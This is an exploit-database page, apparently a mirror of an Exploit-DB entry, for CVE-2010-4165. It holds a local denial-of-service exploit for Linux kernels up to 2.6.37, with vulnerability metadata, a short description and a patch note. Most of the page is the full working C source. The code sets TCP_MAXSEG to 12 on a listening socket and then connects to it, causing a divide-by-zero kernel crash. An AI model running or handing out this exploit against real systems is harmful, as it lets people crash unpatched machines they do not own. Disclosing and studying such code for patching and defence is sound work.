header-logo
Suggest Exploit
vendor:
Kernel
by:
prdelka
7.8
CVSS
HIGH
Denial of Service (DoS)
476
CWE
Product Name: Kernel
Affected Version From: 2.6.37
Affected Version To: 2.6.x
Patch Exists: YES
Related CWE: CVE-2010-4165
CPE: 2.6.37
Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2011-0283/https://www.rapid7.com/db/vulnerabilities/suse-cve-2010-4165/
Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=52062https://www.infosecmatter.com/nessus-plugin-library/?id=51949https://www.infosecmatter.com/nessus-plugin-library/?id=68206https://www.infosecmatter.com/nessus-plugin-library/?id=60965https://www.infosecmatter.com/nessus-plugin-library/?id=55591https://www.infosecmatter.com/nessus-plugin-library/?id=51614https://www.infosecmatter.com/nessus-plugin-library/?id=65103
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2010

Linux Kernel <= 2.6.37 local kernel DoS (CVE-2010-4165)

A divide by 0 error occurs in tcp_select_initial_window when processing user supplied TCP_MAXSEG facilitating a local denial-of-service condition (kernel oops!) in all Linux Kernel 2.6.x branch (2.6.37 & below). This issue can be triggered easily with a call to setsockopt() on a listening network socket and then establishing a TCP connection to the awaiting socket.

Mitigation:

Apply the patch for CVE-2010-4165
Source

Exploit-DB raw data:

/* Linux Kernel <= 2.6.37 local kernel DoS (CVE-2010-4165)
 * =======================================================
 * A divide by 0 error occurs in tcp_select_initial_window
 * when processing user supplied TCP_MAXSEG facilitating a
 * local denial-of-service condition (kernel oops!) in all
 * Linux Kernel 2.6.x branch (2.6.37 & below). This issue 
 * can be triggered easily with a call to setsockopt() on 
 * a listening network socket and then establishing a TCP
 * connection to the awaiting socket. 
 * 
 * -- prdelka
 *
 */
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netinet/tcp.h>


int main() {
	int optval, optlen, ret, sd, sd2, pid;
	char *host = "localhost";	
	struct sockaddr_in locAddr;
	struct sockaddr_in servAddr;
	struct sockaddr_in dstAddr;
	printf("[ Linux Kernel tcp_select_initial_window divide by 0 DoS\n");	
	sd = socket(AF_INET, SOCK_STREAM, 0);
	memset(&servAddr,0,sizeof(servAddr));
	memset(&dstAddr,0,sizeof(dstAddr));
        servAddr.sin_family = AF_INET;
        servAddr.sin_port = htons(60000);
        servAddr.sin_addr.s_addr = INADDR_ANY;
	dstAddr.sin_family = AF_INET;
	inet_aton("127.0.0.1", &dstAddr.sin_addr);
	dstAddr.sin_port = htons(60000);
        if((bind(sd,(struct sockaddr *)&servAddr,sizeof(struct sockaddr))) == -1){
                printf("[ Cannot bind listener service\n");
                exit(-1);
        }
	listen(sd,4);
	optval = 12;
	ret = setsockopt(sd, IPPROTO_TCP, TCP_MAXSEG, &optval, sizeof(optval));
	if(ret==0)
	{
		printf("[ System is not patched against CVE-2010-4165\n[ Goodnight, sweet prince.\n");
		int sin_size = sizeof(struct sockaddr_in);
		switch(pid = fork())
		{
			case 0:
				sd = accept(sd,(struct sockaddr *)&locAddr,&sin_size);
				sleep(3);
			default:
				sd2 = socket(AF_INET, SOCK_STREAM, 0);
				connect(sd2, (struct sockaddr *)&dstAddr, sizeof(dstAddr));
				sleep(3);
		}
	}
	printf("[ System is patched, no dreams for this prince\n");
	return 0;
}

Navigation

Suggest Exploit

Services By CQR